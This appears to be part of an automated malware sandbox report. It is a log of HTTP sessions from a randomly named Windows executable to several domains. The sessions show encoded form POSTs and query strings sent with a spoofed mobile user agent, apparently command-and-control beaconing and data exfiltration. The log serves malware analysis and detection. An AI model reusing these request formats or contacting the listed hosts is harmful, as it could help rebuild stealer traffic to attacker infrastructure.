                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=[TRUNCATED]
                                                            Jan 11, 2025 05:44:23.801690102 CET | 1135 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.10 | 49993 | 156.234.28.101 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:25.492981911 CET | 540 | OUT | GET /dp9c/?UPxHl=S80HqRlhn&rFbdy=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDF3/VOwEaJ+vjCUy5RvaSFOliQEf2CQ== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.btblxhh.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:26.355679989 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;</title><meta name="keywords" content="&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;"/><meta name="description" content="&#9917;&#65039;&#9917;&#65039;&#9917;&#65039;&#84;&#67;&#71;&#24425;&#31080;&#65;&#80;&#80;&#55356;&#57144;&#121;&#107;&#49;&#56;&#56;&#46;&#99;&#99;&#9989;&#39030;&#32423;&#19979;&#27880;&#24179;&#21488;&#44;&#25552;&#20379;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#44;&#84;&#67;&#71;&#24425;&#31080;&#26368;&#26032;&#23448;&#32593;&#44;&#84;&#67;&#71;&#24425;&#31080;&#97;&#112;&#112;&#19979;&#36733;&#44;&#21508;&#31181;&#23089;&#20048;&#21697;&#31181;&#24212;&#26377;&#23613;&#26377;&#44;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#23448;&#26041;&#23458;&# [TRUNCATED]
                                                            Jan 11, 2025 05:44:26.355731964 CET | 778 | IN
                                                            Data Ascii: 2447;&#20026;&#24744;&#26381;&#21153;&#33;"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><script type="text/jav


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.10 | 49994 | 209.74.79.42 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:31.547996998 CET | 807 | OUT | POST /b8eq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.primespot.live
                                                            Origin: http://www.primespot.live
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.primespot.live/b8eq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=tAmYdxGeOSTwWFU8gZt9A1rRM9aw4+bu8IieumxDd/D18AU2Vl8CKj0vhbqBYxesi8IVwFnF9ehjfq9tfuSBPBwVLogQeEXwkVrdrn5GAlWOHvBII5yXuOh3sCtWEyEVd7X4PcofRSe2M0Rw51oCrsiSdlLVRFe1z3Q3VI9cBksYUNMgzfa2GiRuUNTb
                                                            Jan 11, 2025 05:44:32.134721994 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:32 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.10 | 49995 | 209.74.79.42 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:34.092087984 CET | 831 | OUT | POST /b8eq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.primespot.live
                                                            Origin: http://www.primespot.live
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.primespot.live/b8eq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=tAmYdxGeOSTwUlE8i+59HVreQNawtOb18Ieeun1pcMr19ic2EXUCLj0vp7qEcxeri8FqwELF9e1jfv5tf/SCORwXEIgeA0XwkVrdrjorAlOObPxIJYyQx+h04StWPSERd7WvPdkxRRq2Mxtw+koBgsicZlKyCG67plYwNrRnQE0qaMxniO7hVVNgaLmxQNtHVWJNov9z3nwM1xLQjg==
                                                            Jan 11, 2025 05:44:34.685017109 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:34 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.10 | 49996 | 209.74.79.42 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:36.645860910 CET | 1844 | OUT | POST /b8eq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.primespot.live
                                                            Origin: http://www.primespot.live
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.primespot.live/b8eq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=[TRUNCATED]
                                                            Jan 11, 2025 05:44:37.239341021 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:37 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.10 | 49997 | 209.74.79.42 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:39.181746006 CET | 543 | OUT | GET /b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.primespot.live
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:39.808773041 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:39 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.10 | 49998 | 208.91.197.27 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:44.854197025 CET | 825 | OUT | POST /e1ut/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.mohawktooldie.online
                                                            Origin: http://www.mohawktooldie.online
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.mohawktooldie.online/e1ut/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=SE7tgT2n9rTnuLLu18Ey+GTf19wAG3J1ZX9XgaDnH+iGb9kYafnbYHIBysOySGnAFBceHirdYIEA8vhZpqa0lb4MMWDlva6FYjdXO8dhnvP07GAM5zVsjGzNkhcmhdipUy6Ry7X9DTbeljDOwJqG4dMYtwlGNwTIft0ZC8lGo+KLWPQIuHhmxdmT9cKR


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.10 | 49999 | 208.91.197.27 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:47.410501957 CET | 849 | OUT | POST /e1ut/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.mohawktooldie.online
                                                            Origin: http://www.mohawktooldie.online
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.mohawktooldie.online/e1ut/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=SE7tgT2n9rTnuoDuyaMyp2TYw9wAU3JxZXhXgb3JGIaGbfsYbenbbHIB5MO3WGnLFBYsHgvdYIgA8qFZod27mr4KA2D7h66FYjdXO8Jfnvn072wM/R9viGzMtBcmlditUy6vy6KYDVHelizOzYqB3dMewAlUGhqMGIMMbLcMq8OFYOtP/WAxiq6dza/74ttvYIVTeoGpXn5Jjzi59g==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.10 | 50000 | 208.91.197.27 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:50.028844118 CET | 1862 | OUT | POST /e1ut/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.mohawktooldie.online
                                                            Origin: http://www.mohawktooldie.online
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.mohawktooldie.online/e1ut/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy= [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.2.10 | 50001 | 208.91.197.27 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:52.692398071 CET | 549 | OUT | GET /e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.mohawktooldie.online
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:53.598170042 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 11 Jan 2025 04:44:52 GMT
                                                            Server: Apache
                                                            Referrer-Policy: no-referrer-when-downgrade
                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                            Set-Cookie: vsid=911vr4841162928108477; expires=Thu, 10-Jan-2030 04:44:52 GMT; Max-Age=157680000; path=/; domain=www.mohawktooldie.online; HttpOnly
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.2.10 | 50002 | 185.101.158.113 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:58.866154909 CET | 810 | OUT | POST /y54z/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.graviton.energy
                                                            Origin: http://www.graviton.energy
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.graviton.energy/y54z/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=lo7alo5mc8LPl99c9GVD/rOqszxIh1ESvF3kTx3KnGIeQy5cfMf5ZV+lR+rlHCJtSy4kr/CIeOdHwCB0wGNXVOdmvG+A0z3dCPYDZm1lrDmvNsGYjkXyfo23vHKzvU0iTnF9hpphrBccDySSe54p1JE7iRpd7l4H+oErqr5Pmk5Wh2AQ+vX2w7yGgpCa
                                                            Jan 11, 2025 05:44:59.537334919 CET | 1150 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:44:59 GMT
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.10 | 50003 | 185.101.158.113 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:45:01.563301086 CET | 834 | OUT | POST /y54z/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.graviton.energy
                                                            Origin: http://www.graviton.energy
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.graviton.energy/y54z/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=lo7alo5mc8LP/dNc8nVD5LOpvzxIrVEWvFzkTzHanQweQTJceJj5eV+laeqvIiJySyEar9WIeOJHwHl0x1VWUedokm+Cpj3dCPYDZlJfrCOvNdWYgFXtB42o43KzrU1pTnFDhoFHrHYcDziSesMq7JE5txpLyXhP+9sbzoRi73pYmX9Xv+2hjMuIuv3wvE82v5gQFFpPco7CfiSG7Q==
                                                            Jan 11, 2025 05:45:02.166234970 CET | 1150 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:45:02 GMT
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.10 | 50004 | 185.101.158.113 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:45:04.126224995 CET | 1847 | OUT | POST /y54z/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.graviton.energy
                                                            Origin: http://www.graviton.energy
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.graviton.energy/y54z/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy= [TRUNCATED]
                                                            Jan 11, 2025 05:45:04.796638966 CET | 1150 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:45:04 GMT
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.10 | 50005 | 185.101.158.113 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:45:06.666766882 CET | 544 | OUT | GET /y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.graviton.energy
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Jan 11, 2025 05:45:07.352046013 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:45:07 GMT
                                                            Data Ascii: 970<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="de" xml:lang="de"><head> <link rel="stylesheet" href="http://www.graviton.energy/css/app.css"> <script type="text/javascript" src="http://www.graviton.energy/js/app.js"></script> <title>Hier entsteht eine neue Website!</title> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="robots" content="noindex"> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="https://use.typekit.net/bag0psx.css" /> <meta name="csrf-token" content=""> <link rel="prefetch" as="image" href="http://www.graviton.energy/../images/bg-landing-page.jpg" /> <link rel="apple-touch-icon" sizes="180x180" href="http://www.graviton.energy/images/favicons/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="http://www.graviton.energy/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" [TRUNCATED]
Jan 11, 2025 05:45:07.352071047 CET | 1236 | IN | Data Raw: 67 72 61 76 69 74 6f 6e 2e 65 6e 65 72 67 79 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d
                                                            Data Ascii: graviton.energy/images/favicons/favicon-16x16.png"> <link rel="manifest" href="http://www.graviton.energy/images/favicons/manifest.json"> <link rel="mask-icon" href="http://www.graviton.energy/images/favicons/safari-pinned-tab.svg" col
Jan 11, 2025 05:45:07.352086067 CET | 148 | IN | Data Raw: 2d 73 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 c2 a9 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 35 2c 20 68 6f 73 74 74 65 63 68 20 47 6d 62 48
                                                            Data Ascii: -sm"> <div class="copyright"> Copyright 2025, hosttech GmbH </div> </div></footer></div></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.10 | 50006 | 104.21.48.233 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:45:12.402044058 CET | 798 | OUT | POST /p9tq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.ausyva4.top
                                                            Origin: http://www.ausyva4.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.ausyva4.top/p9tq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=7kEXR1BJ94/4hwOXAUanzkLM+pW79AzE/vxEXAc3vxho+JElTxK14Td8SaqTTNCC55ZrDfPrX7kvduN/W9KAFLNmcwhFHh/i2azj+zrAcFeUB3jWgmyUOuaQd7cb4RqXEWJuEjmG4Tli37VeJoz8h2XKVcaSu4GIpKOwy3+tzq2YLR83QvHLfJWTeqZZ
Jan 11, 2025 05:45:13.010396004 CET | 1156 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:12 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
